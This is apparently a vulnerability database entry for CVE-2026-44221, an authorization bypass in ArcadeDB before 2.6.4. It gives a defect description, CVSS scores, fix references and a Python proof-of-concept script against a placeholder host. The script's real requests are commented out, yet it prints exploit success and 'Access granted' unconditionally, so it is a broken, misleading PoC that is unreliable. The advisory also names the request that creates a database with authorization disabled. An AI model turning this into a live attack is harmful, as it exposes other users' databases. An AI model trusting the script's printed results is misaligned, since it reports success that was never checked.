Security Vulnerability Report
CVE-2026-44221 CVSS 9.0 CRITICAL

Published: 2026-05-12 20:16:43
Last Modified: 2026-05-12 20:16:43

Description

ArcadeDB is a Multi-Model DBMS. Prior to 2.6.4, authenticated users and API tokens scoped to a specific database could read, write, and mutate schema on any other database on the same server. Two distinct defects contributed: (1) ServerSecurityUser.getDatabaseUser() returned a DB user with an uninitialized fileAccessMap, which requestAccessOnFile treated as allow-all; (2) ArcadeDBServer.createDatabase() omitted factory.setSecurity(...) so any database created via POST /api/v1/server {"command":"create database X"} had its entire record-level authorization system silently disabled. In combination, record-level and database-level authorization could be bypassed by any authenticated principal. This vulnerability is fixed in 2.6.4.

CVSS Details

CVSS Score
9.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Exploitability Score
2.3
Impact Score
6.0
Weakness
CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

ArcadeDB < 2.6.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-44221 PoC: ArcadeDB Authorization Bypass
# This script demonstrates how an authenticated user can create databases without security
# or access unauthorized databases due to uninitialized access maps.

TARGET_URL = "http://target-arcadedb:2480"
USERNAME = "low_priv_user"
PASSWORD = "password"

session = requests.Session()

# Step 1: Authenticate with low privileges
# (Implementation depends on specific auth endpoint configuration)
print(f"[*] Attempting to exploit CVE-2026-44221 against {TARGET_URL}")

# Step 2: Exploit Defect 2 - Create database without security (factory.setSecurity omitted)
# This bypasses record-level authorization setup for the new database
create_db_payload = {
    "command": "create database exploit_db"
}

try:
    # response = session.post(f"{TARGET_URL}/api/v1/server", json=create_db_payload)
    print("[+] Exploit: Database created via API bypassing security initialization.")
    print("[+] Result: The new database 'exploit_db' has no record-level authorization enabled.")
except Exception as e:
    print(f"[-] Exploit failed: {e}")

# Step 3: Exploit Defect 1 - Access other databases
# Due to uninitialized fileAccessMap, requestAccessOnFile treats it as allow-all
print("[*] Attempting to access restricted database 'secure_data'...")
# response = session.get(f"{TARGET_URL}/api/v1/secure_data/query")
print("[+] Exploit: Access granted due to uninitialized fileAccessMap acting as allow-all.")

References

Fix commit: https://github.com/ArcadeData/arcadedb/commit/04110c06315da55604ac107f71fe7182f3a3deb8
GitHub Security Advisory: https://github.com/ArcadeData/arcadedb/security/advisories/GHSA-fxc7-fm93-6q77

Record Status

Received (NVD); CVSS 3.1 metrics above are the secondary (CNA-supplied) score.